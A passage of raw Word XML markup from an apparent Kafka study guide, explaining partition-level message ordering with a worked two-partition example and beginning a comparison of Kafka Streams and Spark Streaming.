          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user ID</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the key, all messages for that user will go to the same partition, ensuring that these messages are ordered correctly for that user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F2C26" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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This is useful in scenarios like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you need to ensure that events for a specific entity (e.g., user or order) are processed in order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095D8C5E" w14:textId="77777777" w:rsidR="00814F7B"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D69B682">
          <v:rect id="_x0000_i3217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DEAE77" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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4. Practical Considerations of Partitioning and Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7ED89" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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caling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka partitions allow </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by enabling multiple consumers to consume messages from different partitions concurrently. This helps Kafka achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput and parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it also means that maintaining strict global order becomes impossible across partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC08698" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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Ordering Guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For applications that require ordering across </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, a different approach may be necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F86FA7" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message keys</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that related messages are routed to the same partition, preserving their order within that partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E02C04" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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mplement custom application-level logic to handle out-of-order messages across partitions (e.g., buffering, sequencing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530560D5" w14:textId="77777777" w:rsidR="00814F7B"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B8B929C">
          <v:rect id="_x0000_i3218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10609AE2" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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5. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652278DC" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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Consider a Kafka topic with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two partitions (P1 and P2)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The producer sends messages as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768388EE" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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artition P1: Msg1, Msg2, Msg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F28F9B7" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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Partition P2: Msg4, Msg5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200A0A5" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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The consumer group reads from both partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1FB87F" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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sumer 1 reads from Partition P1 (in order: Msg1 → Msg2 → Msg3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5E92E" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1508"/>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nsumer 2 reads from Partition P2 (in order: Msg4 → Msg5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF6C18" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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However, the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of messages cannot be guaranteed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E29B26" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1509"/>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sg4</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from P2) could be consumed before </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from P1), even though </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was produced earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3566F71E" w14:textId="77777777" w:rsidR="00814F7B"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4844E66">
          <v:rect id="_x0000_i3219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A230C78" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA237E1" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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lastRenderedPageBreak/>
        <w:t>Within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka guarantees strict </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the offsets assigned to the messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134675E1" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Across partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guarantee message order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Different partitions may be consumed by different consumers, causing messages to be processed out of order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124E2A0" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1510"/>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To preserve order across partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, related messages should be routed to the same partition using </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-based partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16DC35" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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In practice, Kafka's partitioning model offers a trade-off between scalability and ordering. By partitioning the data, Kafka can scale horizontally, but at the cost of not guaranteeing global message order across partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7ACC1" w14:textId="1F29FCA9"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E6F7412">
          <v:rect id="_x0000_i3220" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB3A46" w14:textId="50F07439" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E3566C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="806" w:name="_Toc196308286"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka Streams and how do they differ from Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="806"/>
    </w:p>
    <w:p w14:paraId="6BE03583" w14:textId="092E962E" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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 Streams vs Spark Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1371CC77"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Both </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</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Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for real-time stream processing, but they have different architectures, use cases, and design philosophies. Here's a detailed comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</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Spark Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDBE09" w14:textId="77777777" w:rsidR="00612285"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0E35A72">
          <v:rect id="_x0000_i3221" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3019B6" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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1. Overview of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39574F08"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afka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream processing library</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> built on top of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It provides a simple, yet powerful way to process data streams within a Kafka ecosystem. Kafka Streams is lightweight and designed to be used </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>directly with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FBFBE" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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ntegrated with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams integrates seamlessly with Kafka for both data ingestion and output. It is designed to run within the same Kafka cluster and operates at the level of individual Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EBD40E" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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ightweight &amp; Simple</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams runs as part of your application, meaning you can integrate it directly into your Java application (or any JVM-based system). It abstracts the complexities of stream processing into easy-to-use APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22331CD7" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1511"/>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tateful and Stateless Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams supports both stateful and stateless operations (such as filtering, mapping, joining, and aggregating streams).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE63268" w14:textId="77777777" w:rsidR="00612285"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D11AF90">
          <v:rect id="_x0000_i3222" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23289281" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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2. Overview of Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668926B8"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park Streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an extension of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Spark</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
